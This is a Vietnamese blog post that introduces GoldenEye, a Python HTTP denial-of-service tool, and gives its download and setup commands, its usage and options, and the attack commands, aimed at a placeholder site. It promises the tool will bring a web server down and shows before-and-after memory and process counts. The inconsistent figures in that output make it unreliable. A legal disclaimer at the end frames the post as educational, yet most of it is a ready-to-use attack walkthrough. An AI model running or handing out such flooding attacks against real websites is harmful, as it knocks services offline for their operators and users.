• Tools Online
    • Tạo CSR
    • SSL Checker
    • DNS Checker
    • View IP
    • Whois Domain
  • Diễn Đàn Hỏi Đáp
  • Profile
  • Ủng hộ
Đỗ Trung Quân
Banner
  • Home
  • Hướng dẫn chung
  • Linux
    • Linux Tricks
    • Distro Linux
      • CentOS/RedHat
      • CloudLinux
      • Ubuntu/Debian
      • AlmaLinux
      • Rocky Linux
    • WebServer
      • NGINX
      • Apache
      • LiteSpeed
      • Reverse Proxy
    • Virtualization
      • KVM
      • Proxmox
      • OpenVZ
    • Monitoring Tool
      • Prometheus
      • Zabbix
    • DevOPS
      • Ansible
      • Docker
      • Kubernetes
      • Jenkins
      • Cloud
        • GCP
        • AWS
        • Azure
    • Mail Server
    • Database
    • VPN
  • ControlPanel
    • cPanel
    • DirectAdmin
    • aaPanel
    • CyberPanel
    • VestaCP
    • FastPanel
    • CloudPanel
    • HestiaCP
    • Script VPS
  • DNS
    • Domain
  • CMS
    • WordPress
    • Laravel
  • Security
    • SSL
    • Firewall
  • Dịch Vụ
    • Thiết Kế Web
    • Dịch vụ cài đặt tối ưu VPS/Server
    • Cài đặt WordPress & Tối ưu WordPress
    • Dịch vụ xử lý mã độc trên WordPress
    • Xác minh cài đặt SSL
    • Dich vụ Backlink
  • Liên Hệ

Trải nghiệm thử GoldenEye, công cụ DOS hiệu quả

by ĐỖ TRUNG QUÂN 30 Tháng Tám, 2019
written by ĐỖ TRUNG QUÂN Published: 30 Tháng Tám, 2019Last Updated on 3 Tháng Bảy, 2021 0 comment 902 views

NỘI DUNG

  • Giới thiệu về HTTP DOS Test Tool GoldenEye
  • GoldenEye công cụ test DOS HTTP
  • Các bước thực hiện
    • Ở máy tấn công, bạn cần tải và cài đặt Python
      • Cài đặt GoldenEye
      • Run GoldenEye – DoS website
        • Ví dụ:
        • OPTIONS:
      • THE ATTACK
      • THE RESULT
        • Before attack
        • After attack

Giới thiệu về HTTP DOS Test Tool GoldenEye

  • GoldenEye là ứng dụng kiểm tra an ninh viết bằng Python.
  • GoldenEye là công cụ test DOS HTTP.
  • Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye công cụ test DOS HTTP

Tools này khi sử dụng sẽ tạo ra lượng traffic lớn để đè tải nặng lên webserver khiến webserver quá tải và không đủ khả năng đáp ứng nhu cầu truy cập và sẽ bị “SẬP” và “DIE” ngay.

Nếu tấn công lâu Database trên webserver sẽ bị crash. Tuy nhiên nếu luồng tấn công trên bị chặn bởi tường lửa (firewall) thì máy tính đang cấn công có thể bị treo cứng do không nhả được các gói tin tới đích được.

Các bước thực hiện

  • Link download GoldenEye

Ở máy tấn công, bạn cần tải và cài đặt Python

Note: Ở đây mình dùng máy tính cá nhân cài Win 10, mình sẽ cài Python lên Win 10, sau đó vào Store Win 10 tải Ubuntu 18 về và cài Python lên Ubuntu 18 này luôn.

 Cài đặt python
  • Link download Python

Cài đặt GoldenEye

 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả
 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả

Bạn thực hiện cài đặt với các lệnh như sau

root@dotrungquan:~# mkdir GoldenEye
root@dotrungquan:~# cd GoldenEye/
root@dotrungquan:~/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
root@dotrungquan:~/GoldenEye# unzip master.zip

Run GoldenEye – DoS website

USAGE: ./goldeneye.py <url> [OPTIONS]
Ví dụ:
./goldeneye.py https://dotrunquan.info
 Trải nghiệp thử GoldenEye, công cụ DOS hiệu quả
OPTIONS:
Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE ATTACK

root@dotrungquan:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

THE RESULT

Before attack
root@someserver [~]# free -m
total used free shared buffers cached
Mem: 1024 713 302 49 9 150
-/+ buffers/cache: 552 1001
Swap: 9990 40 160

root@someserver [~]# pgrep httpd | wc -l
11
After attack
root@serv1 [~]# free -m
total used free shared buffers cached
Mem: 1024 101 90 49 9 150
-/+ buffers/cache: 3544 190
Swap: 990 40 150
root@someserver [~]# pgrep httpd | wc -l
174

Chú ý: Nếu các bạn sử dụng công cụ này với mục đích xấu sẽ phải chịu mọi trách nhiệm pháp lý trước pháp luật, bài viết mang tính chất giới thiệu để các bạn mở rộng kiến thức của mình.

Tài liệu tham khảo: GitHub.

5/5 - (1 bình chọn)

Hãy tham gia Nhóm Hỗ Trợ VPS Hosting để cùng học hỏi và trao đổi kiến thức nhé. Chúc bạn thành công.

ddosgoldeneye
Share 0 FacebookTwitterPinterestTelegramEmail
ĐỖ TRUNG QUÂN

Mình tên là Đỗ Trung Quân, hiện đang công tác tại AZDIGI với vị trí là SysAdmin. Mình đam mê viết Blog. Vì viết Blog giúp mình trau dồi được nhiều kỹ năng. Học hỏi thêm nhiều kiến thức mới, từ đó mình có thể chia sẻ đến các bạn các bài viết tài liệu bổ ích hơn. Hiện tại mình là admin của Blog dotrungquan.info - linuxcanban.com - it.info.vn. Mới đây mình có tạo ra một Nhóm Hỗ Trợ VPS Hosting với mục đích gây dựng một cộng đồng nhỏ để mọi người trao đổi kinh nghiệm, kiến thức quản trị VPS. Các thủ thuật, mẹo vặt khi sử dụng VPS. Rất mong nhận được sự ủng hộ của các bạn.

Bạn sẽ thích bài viết này

Hướng dẫn cài đặt Ubuntu Server 20.04 LTS

17 Tháng Ba, 2023

Hướng dẫn xoá cache trình duyệt và máy...

3 Tháng Ba, 2019

Hướng dẫn sửa lỗi Database mất khoá chính...

14 Tháng Ba, 2023

Quét mã độc website với Malware Expert –...

7 Tháng Ba, 2023

Chuyển hướng trang 404 về trang chủ

7 Tháng Ba, 2023

Những tính năng mới và cải tiến đáng...

26 Tháng Hai, 2023

Hướng dẫn tạo file info.php

19 Tháng Hai, 2023

Một số cấu hình .htaccess thường sử dụng

11 Tháng Hai, 2023

Cấu hình hiển thị IP thực của khách...

10 Tháng Hai, 2023

Hướng dẫn tạo tài khoản ChatGPT ở Việt...

6 Tháng Hai, 2023
Theo dõi
Đăng nhập
Thông báo của
guest

guest

0 Comments
Phản hồi nội tuyến
Xem tất cả bình luận

Nhóm Hỗ Trợ Hosting VPS

Nhóm Hỗ Trợ VPS Hosting

Tin Khuyến Mãi

Thông tin về tôi

Thông tin về tôi

Mình tên là Đỗ Trung Quân, hiện đang công tác tại AZDIGI với vị trí là SysAdmin. Mình đam mê viết Blog. Vì viết Blog giúp mình trau dồi được nhiều kỹ năng. Học hỏi thêm nhiều kiến thức mới, từ đó mình có thể chia sẻ đến các bạn các bài viết tài liệu bổ ích hơn.

Facebook Instagram Youtube Telegram

BÀI VIẾT PHỔ BIẾN

  • 1

    Hướng dẫn chuyển website WordPress bằng All in one Migration

  • 2

    Sử dụng Plugin Query Monitor để gỡ lỗi và tăng hiệu suất

  • 3

    Những tính năng mới trong WordPress 6.2

  • 4

    Khắc phục thông báo “utf8mb4 yêu cầu thư viện mới hơn” trên WordPress

Phản hồi gần đây

  • Minh trong Thiết lập nhiều website sử dụng chung một tài khoản MySQL
  • Lê Văn trong Hướng dẫn trỏ tên miền về Blogspot (blogger)
  • Quân trong Hướng dẫn cài đặt và cấu hình plugin W3 Total Cache cho website WordPress
  • Học Luật trong Sử dụng RSYNC để Clone một VPS hoàn chỉnh

Top Commentators

  • Anh Quân Anh Quân (133)
  • nghĩa nghĩa (8)
  • Bùi Đức Hiệp Bùi Đức Hiệp (7)
  • David Do David Do (7)
  • Bamboo Bamboo (5)
  • Bình Minh Bình Minh (5)
  • Cai Việt Hoàng Cai Việt Hoàng (5)
  • Duc Thuan Duc Thuan (5)

BẠN BÈ & ĐỐI TÁC

Thạch Phạm | aaPanel | Linux Căn Bản | Bảo Trần | Trương Quốc Cường | Đàm Trung Kiên | CaiSSL.com

Bạn được quyền sao chép lại nội dung trên website Đỗ Trung Quân, miễn là có dẫn nguồn.

Hosting/VPS được tài trợ bởi AZDIGI - Nhà cung cấp Server Hosting tốt nhất hiện nay

AZDIGI - Nhà cung cấp Server Hosting tốt nhất hiện nay


Back To Top
Đỗ Trung Quân
  • Home
  • Hướng dẫn chung
  • Linux
    • Linux Tricks
    • Distro Linux
      • CentOS/RedHat
      • CloudLinux
      • Ubuntu/Debian
      • AlmaLinux
      • Rocky Linux
    • WebServer
      • NGINX
      • Apache
      • LiteSpeed
      • Reverse Proxy
    • Virtualization
      • KVM
      • Proxmox
      • OpenVZ
    • Monitoring Tool
      • Prometheus
      • Zabbix
    • DevOPS
      • Ansible
      • Docker
      • Kubernetes
      • Jenkins
      • Cloud
        • GCP
        • AWS
        • Azure
    • Mail Server
    • Database
    • VPN
  • ControlPanel
    • cPanel
    • DirectAdmin
    • aaPanel
    • CyberPanel
    • VestaCP
    • FastPanel
    • CloudPanel
    • HestiaCP
    • Script VPS
  • DNS
    • Domain
  • CMS
    • WordPress
    • Laravel
  • Security
    • SSL
    • Firewall
  • Dịch Vụ
    • Thiết Kế Web
    • Dịch vụ cài đặt tối ưu VPS/Server
    • Cài đặt WordPress & Tối ưu WordPress
    • Dịch vụ xử lý mã độc trên WordPress
    • Xác minh cài đặt SSL
    • Dich vụ Backlink
  • Liên Hệ
wpDiscuz